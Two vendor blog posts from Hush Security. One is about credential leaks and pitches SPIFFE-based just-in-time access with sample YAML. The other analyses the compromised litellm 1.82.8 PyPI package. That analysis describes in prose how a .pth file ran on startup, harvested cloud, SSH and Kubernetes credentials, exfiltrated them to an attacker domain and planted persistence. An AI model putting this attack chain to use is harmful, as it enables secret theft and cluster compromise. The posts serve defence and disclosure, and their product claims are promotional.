For the CISO: Forward this to your infra team. The solution is three YAML files.

For the infra team: This is how you eliminate the entire class of credential-leak breaches – for every service in your stack.

ShinyHunters breached Anodot. Anodot had tokens connecting it to Rockstar’s Snowflake. You know the rest. Many postmortems from the last 18 months end the same way: “Rotate all potentially exposed secrets.”

Snowflake, OpenAI, Postgres, Redis, Elasticsearch… they all hand out keys by default. Those keys will end up somewhere they shouldn’t. In a JFrog artifact. Cleartext in a git commit. An S3 config file. A Kubernetes ConfigMap. And eventually, they’ll be found.

Managing NHI credentials is not a GTA-play. Fixing it time after time is not solving it. The solution is removing the key entirely.

Who is ShinyHunters?

ShinyHunters is a prolific cybercrime group responsible for some of the largest data breaches of the last five years – AT&T, Ticketmaster, Santander, and dozens more. Their method is rarely sophisticated: find a credential left somewhere it shouldn’t be, use it.

Rockstar statement in full follows from last week:

The Real Problem: It’s Not Just One Thing

Problem #1: Every Service Speaks a Different Auth Language

This is why it’s so hard to solve. It’s not just that services hand out long-lived credentials – it’s that they all hand out different kinds:

Category | Services | Auth Method
AI / LLM providers | OpenAI, Anthropic, Grok, Vertex AI, Bedrock | API key, IAM role, service account
Databases | PostgreSQL, MySQL, MariaDB, MongoDB, Snowflake, Redis | Password, connection string, key pair, x.509 cert
Search & analytics | Elasticsearch, OpenSearch, Datadog | API key, username/password, service token
Messaging & brokers | Kafka, RabbitMQ | SASL username/password, SCRAM, mTLS, OAuth
Cloud & infra | AWS, GCP, Azure, Kubernetes | IAM role, managed identity, service account token
SaaS & business apps | GitHub, Slack, Jira, Confluence | API token, OAuth, PAT

The fragmentation means you can’t enforce one consistent policy across your stack. Every service is its own island. You can’t adopt one rotation policy across API keys, connection strings, x.509 certs, and IAM roles, and you can’t realistically audit whether every vendor holding every credential type has rotated on schedule.

Problem #2: Someone Will Always Cut a Corner

No policy survives contact with a deadline. There will always be a DevOps engineer, a developer, or an architect moving fast, and they’ll store that credential somewhere it shouldn’t be (I’ve done it myself; we all have). In a JFrog artifact. Cleartext in a git commit. An S3 config file. A Kubernetes ConfigMap. Not because they’re careless. Because the current model requires them to handle credentials in the first place.

You can write all the policies you want. You cannot stop a human from doing what humans do under pressure.

Therefore, the solution cannot be implemented within the authentication model of each individual service. Instead, it must operate as a unified governance layer, enforcing a single, consistent access control policy regardless of whether the underlying service relies on an API key, a password, a certificate, or a token. This architecture must also eliminate the risk of credential exposure by design, because no human ever handles the credentials directly.

What You Can Actually Do Today (And It’s Simpler Than You Think)

Imagine granting access to Snowflake, OpenAI, Redis, Elasticsearch, PostgreSQL, Datadog, and the rest of your stack just-in-time (JIT), scoped to the exact workload that needs it, with full cryptographic attestation, and never having a credential sitting anywhere to steal.

That’s what Hush Security does. It’s SPIFFE-native out of the box.

Every workload gets a SPIFFE identity, a cryptographically verified ID tied to its runtime environment (Kubernetes namespace, service account, node). When the workload needs access to Snowflake, it doesn’t look up a stored password. It presents its SPIFFE identity, Hush verifies it, and issues a short-lived scoped credential directly to the workload at runtime. The credential expires. Nothing is stored. Nothing can end up in a git commit, a JFrog artifact, a ConfigMap, or an S3 file, because it never existed as a static thing.
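To make the flow above concrete, here is a minimal sketch of just-in-time issuance. It is not the Hush API: the `Broker` class, the policy shape, the scope string, and the five-minute TTL are all hypothetical, and the sketch assumes the caller's SPIFFE identity has already been cryptographically verified before `issue` is called.

```python
import secrets
import time
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class ScopedCredential:
    spiffe_id: str     # identity the credential was issued to
    scope: str         # illustrative scope label, e.g. "snowflake:SELECT"
    token: str         # random value held in memory only in this sketch
    expires_at: float  # Unix timestamp after which the token is dead

    def is_valid(self, now: float) -> bool:
        return now < self.expires_at


class Broker:
    """Hypothetical in-memory broker (assumption, not a real product API)."""

    def __init__(self, policy: dict[str, str], ttl_seconds: int = 300):
        # policy maps an allowed SPIFFE ID to the scope it may receive
        self._policy = policy
        self._ttl = ttl_seconds

    def issue(self, spiffe_id: str, now: Optional[float] = None) -> ScopedCredential:
        # Assumes spiffe_id was verified upstream (e.g. via its SVID).
        now = time.time() if now is None else now
        scope = self._policy.get(spiffe_id)
        if scope is None:
            raise PermissionError(f"no policy for {spiffe_id}")
        token = secrets.token_urlsafe(32)
        return ScopedCredential(spiffe_id, scope, token, now + self._ttl)
```

The point of the design is that nothing outlives the TTL: a copy of the token taken after `expires_at` is useless, and a workload with no matching policy entry never receives one at all.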

Developers never touch the credential. There’s nothing to misplace. No more “rotate your secrets.” There’s nothing to rotate.

The Setup: Three YAML Files

Define the connector (what to connect to: OpenAI, Anthropic, Grok, Vertex AI, Bedrock, PostgreSQL, MySQL, MariaDB, MongoDB, Snowflake, Redis, Elasticsearch, OpenSearch, Datadog, Kafka, RabbitMQ, AWS, GCP, Azure, Kubernetes), the privilege (what access it gets), and the policy (which workload identity receives it). That’s it.

1. connector.yaml - the connection (Snowflake as an example):

apiVersion: am.hush.security/v1alpha1
kind: AccessCredential
metadata:
  name: demo-snowflake
  namespace: hush-security
spec:
  type: snowflake
  config:
    account: <ORG-ID>-<ACCOUNT-ID>
    warehouse: COMPUTE_WH
    database: DB
    schema: PUBLIC
    username: user_analytics
    auth_method: key-pair
  secretRef:
    name: demo-snowflake-secret
  keyMappings:
    private_key: snowflake-private-key

2. access-privilege.yaml - minimum access only:

apiVersion: am.hush.security/v1alpha1
kind: AccessPrivilege
metadata:
  name: snowflake-readonly
  namespace: hush-security
spec:
  type: snowflake
  config:
    grants:
      - privileges: [SELECT]
        resource_type: table
      - privileges: [USAGE]
        resource_type: warehouse

3. access-policy.yaml - which workload gets it, verified by SPIFFE:

apiVersion: am.hush.security/v1alpha1
kind: AccessPolicy
metadata:
  name: analytics-snowflake-access
  namespace: hush-security
spec:
  enabled: true
  accessCredentialRef:
    name: demo-snowflake
  accessPrivilegeRefs:
    - name: snowflake-readonly
  attestationCriteria:
    - type: "k8s:ns" # SPIFFE attestation - only workloads in this namespace
      value: analytics
  deliveryConfig:
    type: env # injected at runtime, never stored
    config:
      items:
        - { name: SNOWFLAKE_USERNAME, key: username, type: key }
        - { name: SNOWFLAKE_PRIVATE_KEY, key: private_key, type: key }
        - { name: SNOWFLAKE_ROLE, key: role, type: key }

The attestationCriteria is the key part. Hush verifies the workload’s SPIFFE identity before issuing anything. Only workloads in the analytics namespace get these credentials – not a developer’s laptop, not a CI pipeline, not a third-party vendor’s misconfigured environment. The credential arrives at runtime, lives for the duration of the job, and disappears.
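The matching step can be sketched in a few lines of Python. This is an illustration of the idea, not how Hush evaluates policies: the `matches` function is hypothetical, and treating multiple criteria as a logical AND is an assumption. The selector strings follow the `k8s:ns:<namespace>` shape that SPIRE's Kubernetes attestor produces.

```python
def matches(criteria: list[dict[str, str]], selectors: set[str]) -> bool:
    """Return True only if every criterion is among the attested selectors.

    criteria  -- entries shaped like the YAML above: {"type": ..., "value": ...}
    selectors -- attested facts about the workload, e.g. {"k8s:ns:analytics"}
    """
    if not criteria:
        # An empty policy must never match everything by accident.
        return False
    return all(f"{c['type']}:{c['value']}" in selectors for c in criteria)


policy = [{"type": "k8s:ns", "value": "analytics"}]
analytics_pod = {"k8s:ns:analytics", "k8s:sa:report-job"}
ci_runner = {"k8s:ns:ci", "k8s:sa:builder"}
print(matches(policy, analytics_pod), matches(policy, ci_runner))
```

A developer laptop or a vendor environment produces no attested selectors for the analytics namespace, so the check fails before any credential is minted.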

Same pattern works for every service in your stack. Repeat for OpenAI, Redis, Elasticsearch, Datadog, MySQL, MongoDB.

What This Means in Practice

Before | After
Static key stored in vendor’s config | No key stored anywhere
Developer creates + manages credentials | Declare a policy, Hush handles the rest
“Rotate after breach” | Nothing to rotate – credential never persisted
Third-party breach = your data at risk | Third-party breach = attacker finds nothing
Someone always cuts a corner under pressure | No one can – because no one ever holds a credential
Keys leak into git, JFrog artifacts, S3, ConfigMaps | Credential is provisioned and delivered just-in-time, exclusively to the intended workload

Anodot gets breached. Attacker searches for Snowflake credentials. Finds nothing – because the credential was issued for that run, verified against a SPIFFE identity, scoped to SELECT only, and expired before the breach happened.

Snowflake, OpenAI, Postgres, Datadog, Redis, Elasticsearch – unstealable.

Not because they’re stored better. Because they were never stored.

Sources: ShinyHunters / Anodot / Rockstar – HackRead, TechCrunch

Your Dependency Tree is Your Attack Surface

Hush Security Engineering Engineering Team

Last week, a malicious package sat on PyPI for less than an hour. It was pulled in by millions of projects as a transitive dependency. It silently harvested every secret on every machine that installed it, encrypted the haul with a hardcoded RSA key, and shipped it to an attacker-controlled server. Then it tried to pivot into Kubernetes, plant a persistent backdoor, and spread across every node in the cluster.

The package was litellm 1.82.8. The attacker didn’t compromise a cloud provider or exploit a zero-day. They uploaded a Python package. That was enough.

We want to walk through exactly how this worked, why the standard toolkit failed to stop it, and what a different security model looks like in practice.

How the attack worked

The compromised litellm 1.82.8 release (and 1.82.7, which was also affected) included a file called litellm_init.pth. Python’s site module processes .pth files automatically on every interpreter startup, before any application code runs, with no import statement required. Dropping a .pth file into a package is one of the most reliable code execution primitives available to a PyPI attacker: silent, automatic, and almost never audited.
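Because `site` executes any `.pth` line that begins with `import`, those lines are worth auditing. The sketch below lists them for one directory. The function name is ours, and a hit is a prompt for review rather than a verdict: some legitimate tooling, such as setuptools, also ships `.pth` files with import lines.

```python
from pathlib import Path


def executable_pth_lines(directory: Path) -> list[tuple[str, str]]:
    """Return (filename, line) pairs for .pth lines the site module would execute.

    Lines starting with "import" followed by a space or tab are run as code
    at interpreter startup; other non-comment lines are treated as paths.
    """
    findings = []
    for pth in sorted(directory.glob("*.pth")):
        text = pth.read_text(encoding="utf-8", errors="replace")
        for line in text.splitlines():
            if line.startswith(("import ", "import\t")):
                findings.append((pth.name, line))
    return findings
```

To audit an environment, call it on each directory returned by `site.getsitepackages()` and review anything unexpected.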

Figure 1: The three-stage attack chain, from PyPI upload through direct and transitive installs to credential harvest, exfiltration, and Kubernetes persistence.

The payload ran in three stages:

Stage 1: Harvest. A Python script crawled the filesystem for everything a cloud attacker would want: SSH private keys and config files, .env files, cloud provider credentials (~/.aws/credentials, GCP Application Default Credentials at ~/.config/gcloud/, Azure CLI tokens at ~/.azure/), Kubernetes configs at ~/.kube/config, .gitconfig, shell history, and anything matching common secret filename patterns. It also hit cloud metadata endpoints directly: the AWS IMDS at http://169.254.169.254, GCP metadata at http://metadata.google.internal, and container credential endpoints, to capture ephemeral tokens that would never appear on disk.

Stage 2: Exfiltrate. The collected data was encrypted with a random AES-256-CBC session key. That session key was then wrapped with a hardcoded 4096-bit RSA public key, bundled into a tar archive, and POSTed to https://models.litellm.cloud/, a domain crafted to pass a casual glance as legitimate litellm infrastructure. Only the attacker held the RSA private key, so the payload was unreadable in transit to anyone else.

Stage 3: Persist and spread. If a Kubernetes service account token existed at /var/run/secrets/kubernetes.io/serviceaccount/token, the malware used the Kubernetes API to enumerate and exfiltrate all cluster secrets across all namespaces, then attempted to schedule a privileged alpine:latest pod on every node in kube-system. Each pod mounted the host filesystem at /host and wrote a persistent backdoor to ~/.config/sysmon/sysmon.py, registered as a systemd user service at ~/.config/systemd/user/sysmon.service. The same persistence routine ran on the local machine regardless of whether Kubernetes was present.

The blast radius extended far beyond anyone who explicitly ran pip install litellm. Any package declaring litellm>=1.64.0 as a dependency pulled in the compromised version automatically, including widely used AI frameworks. LiteLLM sees roughly 97 million monthly PyPI downloads. Most victims would have had no idea they were affected.
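The reason an open-ended range is enough to pull in a bad release can be shown with a deliberately simplified model. The helpers below are ours and handle plain dotted numeric versions only; real resolvers implement the full PEP 440 rules.

```python
from typing import Optional


def parse(version: str) -> tuple[int, ...]:
    """Turn "1.82.8" into (1, 82, 8). Numeric dotted versions only."""
    return tuple(int(part) for part in version.split("."))


def satisfies_lower_bound(candidate: str, minimum: str) -> bool:
    """Model a requirement of the form package>=minimum."""
    return parse(candidate) >= parse(minimum)


def newest_allowed(available: list[str], minimum: str) -> Optional[str]:
    """Pick the newest release that satisfies the lower bound, as installers tend to do."""
    allowed = [v for v in available if satisfies_lower_bound(v, minimum)]
    return max(allowed, key=parse, default=None)


# The version list here is illustrative, not a real release history.
print(newest_allowed(["1.64.0", "1.82.6", "1.82.8"], "1.64.0"))
```

With only a lower bound, the newest upload always wins. An environment pinned to an exact earlier version would not have moved on its own.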

The attack was discovered by accident. The .pth launcher spawned a child Python process via subprocess.Popen. Because .pth files execute on every interpreter startup, that child immediately triggered the same .pth again, producing an exponential fork bomb. A developer at FutureSearch noticed their machine running out of RAM after an MCP plugin pulled in litellm 1.82.8 as a transitive dependency inside Cursor. A competent attacker would not have made that mistake. The window of exposure would have been measured in days or weeks, not hours.

Why your existing tools would not have caught this

Before getting to what Hush does, it is worth being specific about why the standard security stack fails against this class of attack.

Software composition analysis (SCA) and dependency scanning check known vulnerability databases. This was not a known vulnerability. The malicious release was published under the legitimate package name, so there was no advisory to match it against. No CVE was ever filed. An SCA scanner pointed at your lockfile after the fact would have found nothing.

Secret scanning looks for secrets committed to source control or present in CI logs. The secrets in this attack lived on developer workstations and in running service environments, not in git. Secret scanning would not have seen them.

Network egress controls might have caught the exfiltration POST to models.litellm.cloud, if you had strict allowlisting in place. Most environments do not. Developer laptops almost never do. And the domain was designed to blend in.
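As a rough illustration of what strict allowlisting means, the sketch below permits a destination only on an exact hostname match. The allowlist contents and the function name are illustrative assumptions. In practice this decision is enforced at a proxy or firewall, not in application code.

```python
from urllib.parse import urlsplit

# Illustrative allowlist (assumption): exact hostnames only, no wildcards.
ALLOWED_HOSTS = frozenset({"pypi.org", "files.pythonhosted.org", "api.openai.com"})


def egress_allowed(url: str, allowed_hosts: frozenset = ALLOWED_HOSTS) -> bool:
    """Allow a request only if its hostname is exactly on the allowlist."""
    host = urlsplit(url).hostname  # already lower-cased by urlsplit
    return host is not None and host in allowed_hosts


print(egress_allowed("https://pypi.org/simple/litellm/"))
print(egress_allowed("https://models.litellm.cloud/"))
```

Exact matching is the important design choice. A rule that accepts anything containing "litellm" would have let the lookalike domain through.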

Vault and secrets management tools like HashiCorp Vault or AWS Secrets Manager reduce secret sprawl when used correctly, but they still issue secrets that land somewhere: in environment variables, in files, in memory accessible to any process running as the same user. A malicious package running in the same process space or as the same OS user can reach them.

The uncomfortable truth is that all of these controls are perimeter defenses. They assume the code running on your machines is trustworthy. Supply chain attacks invalidate that assumption at the root.

The structural problem: secrets are just files

It is tempting to frame yesterday’s attack as a PyPI moderation failure, or a litellm maintainer incident. Both of those things are true and worth fixing. But they do not explain why the attack was so effective or why rotating credentials after the fact is the best available response.

Every credential that was exfiltrated (AWS access keys, GCP ADC tokens, Kubernetes configs, SSH keys, .env API keys) shared one property: it was a long-lived, static secret sitting on disk. Secrets do not authenticate their reader. They do not know whether the process opening ~/.aws/credentials is your application or malware that arrived as a transitive dependency of a package you installed this morning. Possession is the entire security model.

Supply chain attacks are designed to exploit exactly this. A malicious package runs inside your trust boundary with the same filesystem permissions as the developer who installed it. It does not need to escalate privileges or bypass endpoint controls. It just needs to read files, which any process can do.

Telling developers to rotate secrets more frequently, use a vault, or avoid hardcoding does not change this. As long as access to a resource is gated by possession of a file, any code that can read files can compromise it. The rotation cadence just determines how long the window stays open after a theft.

What a different model looks like

At Hush, we build on a different premise: the credential should never exist on the machine in the first place. Access should be granted based on verified identity and evaluated policy, not on possession of a secret.

Here is what that means concretely for this attack:

Figure 2: How Hush neutralises each stage of the attack. No static secrets to harvest, runtime anomaly detection on exfiltration, and JIT-scoped tokens that make Kubernetes lateral movement structurally impossible.

No static secrets means the harvest finds nothing. When services access AWS, GCP, Azure, databases, or APIs through Hush, they receive short-lived, dynamically issued tokens scoped to exactly the permissions the current workload requires. There is no ~/.aws/credentials. No .env file full of API keys. No Kubernetes Secret holding a database password. A malicious package doing a filesystem crawl returns empty-handed, because the material it is looking for does not exist in that form.

Runtime monitoring surfaces the exfiltration attempt. Hush’s runtime sensor uses eBPF to observe system calls without kernel modification or agent overhead. It tracks which processes open which files, which network connections they initiate, and which identities are behind each action. In the litellm scenario, the sensor would have observed: a Python child process (spawned from a .pth handler) opening credential-shaped files across multiple directories, followed immediately by an outbound TLS connection to models.litellm.cloud from a non-human identity with no policy permitting that destination. That sequence generates an alert with full process ancestry, file access trace, and network destination before the POST completes. The security team sees exactly what happened and which workloads were affected, without waiting for a crash report.

Scoped JIT tokens contain lateral movement. Kubernetes service account tokens issued through Hush are scoped to the minimum permissions the workload needs and expire after a short TTL. A token that allows a pod to read its own namespace’s ConfigMaps cannot be used to list secrets across all namespaces or schedule pods in kube-system. The lateral movement stage of this attack requires a cluster-admin-level or broadly scoped service account token to exist as a long-lived credential. With Hush, that token does not exist. The API calls the malware makes return 403, and the attempt is logged.
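The containment argument can be expressed as a toy authorization check. This is a hypothetical model, not Kubernetes RBAC and not the Hush implementation: a token carries an explicit list of grants, and any request outside that list is refused.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Grant:
    verb: str       # e.g. "get", "list", "create"
    resource: str   # e.g. "configmaps", "secrets", "pods"
    namespace: str  # a single namespace; no wildcard grants in this sketch


def authorize(grants: tuple[Grant, ...], verb: str, resource: str, namespace: str) -> int:
    """Return an HTTP-style status: 200 if a grant covers the request, else 403."""
    requested = Grant(verb, resource, namespace)
    return 200 if requested in grants else 403


# A token scoped to reading ConfigMaps in its own namespace (illustrative).
token_grants = (Grant("get", "configmaps", "analytics"),)

print(authorize(token_grants, "get", "configmaps", "analytics"))  # the workload's normal call
print(authorize(token_grants, "list", "secrets", "*"))            # cluster-wide secret listing
print(authorize(token_grants, "create", "pods", "kube-system"))   # privileged pod scheduling
```

Both malicious calls fall outside the grant list, which is the structural reason the lateral movement stage fails.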

There is nothing to rotate after the fact. Incident response after a supply chain compromise normally means identifying every secret that was present on every affected machine and rotating all of them across every system that accepted them. That is an enormous operational exercise, it is time-pressured, and it is still reactive: you are closing a window after the theft. With Hush, the tokens that were present when the malware ran were already scoped and short-lived. They expired on their own. The cleanup conversation is about reviewing the runtime alert and confirming no persistent backdoor was installed, not about tracking down which of your 300 service credentials may have been copied.

If you were affected yesterday

If you installed or upgraded litellm on March 24, 2026, treat any machine that ran it as compromised. The immediate steps:

  • Confirm the version: run pip show litellm and check for 1.82.7 or 1.82.8 in all environments, virtual environments, and uv caches (find ~/.cache/uv -name "litellm_init.pth")
  • Check for persistence: look for ~/.config/sysmon/sysmon.py and ~/.config/systemd/user/sysmon.service on affected machines
  • Audit Kubernetes: check kube-system for pods matching node-setup-* and review audit logs for secret enumeration across namespaces
  • Rotate all credentials that were present: SSH keys, AWS/GCP/Azure credentials, Kubernetes configs, database passwords, and any API keys in .env files or environment variables
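The filesystem checks above can be scripted. The sketch below looks only for the paths named in this post, under a given home directory. The function name is ours, and an empty result does not prove a machine is clean.

```python
from pathlib import Path

# Persistence paths named in this post, relative to the user's home directory.
PERSISTENCE_PATHS = (
    ".config/sysmon/sysmon.py",
    ".config/systemd/user/sysmon.service",
)


def find_indicators(home: Path) -> list[Path]:
    """Return any known indicator files found under the given home directory."""
    hits = [home / rel for rel in PERSISTENCE_PATHS if (home / rel).exists()]
    uv_cache = home / ".cache" / "uv"
    if uv_cache.is_dir():
        # Equivalent to: find ~/.cache/uv -name "litellm_init.pth"
        hits.extend(sorted(uv_cache.rglob("litellm_init.pth")))
    return hits
```

Run it as `find_indicators(Path.home())` on each affected machine, and treat any hit as confirmation that the machine needs the full rotation described above.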

Rotation is necessary. It is also a good moment to ask how many of those secrets needed to be long-lived in the first place, and how many machines they were distributed across. That count is your structural exposure.

The question this attack puts to every engineering team is not “were we hit?” It is “what would our posture look like if a package like this ran on our machines for a week without crashing anything?” If the answer involves rotating hundreds of secrets across dozens of systems after the fact, the architecture itself is the risk.

We built Hush to make that question less frightening. If you want to see what eliminating static secrets looks like for your stack, we are happy to walk through it.

Hush Security delivers a unified access and governance platform for AI and non-human identities, replacing secrets with verified identities and dynamic, just-in-time access policies. 
